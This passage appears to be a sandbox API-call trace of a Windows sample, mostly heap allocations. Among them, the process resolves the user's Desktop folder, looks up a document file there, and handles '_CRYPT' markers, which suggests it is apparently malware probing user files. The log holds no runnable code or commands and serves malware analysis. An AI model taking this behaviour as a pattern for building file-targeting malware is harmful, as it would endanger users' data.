hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0136.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0136.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0136.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0136.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0136.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0136.827] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0136.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0136.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0136.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0136.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0136.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0136.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0136.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0136.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80220 | out: hHeap=0x970000) returned 1 [0136.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0136.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0136.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0136.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0136.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0136.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0136.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0136.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0136.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0136.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0136.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0136.827] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0136.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0136.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0136.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0136.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0136.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0136.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0136.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0136.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0136.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0136.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0136.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0136.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0136.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0136.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0136.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0136.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0136.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0136.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0136.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0136.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0136.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0136.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0136.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0136.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53938 [0136.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0136.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0136.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0136.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0136.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0136.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0136.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0136.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0136.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0136.829] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0136.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0136.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0136.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0136.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0136.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0136.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0136.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0136.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0136.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0136.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0136.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0136.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0136.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0136.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0136.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0136.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0136.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0136.830] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0136.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0136.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0136.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0136.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0136.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0136.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0136.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0136.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0136.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0136.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0136.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0136.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0136.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0136.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0136.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0136.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0136.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0136.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0136.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0136.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0136.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0136.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0136.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0136.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0136.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0136.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0136.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0136.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0136.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0136.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0136.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0136.831] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0136.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0136.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0136.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0136.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0136.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0136.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0136.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0136.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0136.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0136.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0136.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0136.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0136.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0136.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0136.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0136.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0136.832] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0136.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0136.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0136.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0136.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0136.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0136.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0136.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0136.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0136.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0136.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0136.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0136.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0136.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0136.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0136.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0136.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0136.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0136.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0136.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0136.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0136.833] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/AuSKwF8iMWxqYFgPtC.odp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b9e2380, ftCreationTime.dwHighDateTime=0x1d5e66c, ftLastAccessTime.dwLowDateTime=0x677f4ed0, ftLastAccessTime.dwHighDateTime=0x1d5e42f, ftLastWriteTime.dwLowDateTime=0x677f4ed0, ftLastWriteTime.dwHighDateTime=0x1d5e42f, nFileSizeHigh=0x0, nFileSizeLow=0x15985, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="AuSKwF8iMWxqYFgPtC.odp", cAlternateFileName="AUSKWF~1.ODP")) returned 0xa87250 [0136.833] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0136.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0136.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0136.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0136.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0136.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0136.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0136.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0136.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0136.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0136.833] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0136.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0136.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0136.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0136.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0136.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0136.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0136.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0136.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0136.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0136.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0136.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0136.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0136.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0136.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0136.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0136.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0136.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0136.834] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0136.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0136.834] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0136.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0136.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0136.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0136.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0136.835] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0136.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0136.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0136.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0136.835] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0136.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0136.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0136.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0136.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0136.835] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0136.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0136.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0136.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0136.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0136.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0136.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0136.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0136.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0136.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0136.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0136.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0136.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0136.836] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0136.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0136.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0136.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0136.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0136.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0136.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0136.836] RtlAllocateHeap 